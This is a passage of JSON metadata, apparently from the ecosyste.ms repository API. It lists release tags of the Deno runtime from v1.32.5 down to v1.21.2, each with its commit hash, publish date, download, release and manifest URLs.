3.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","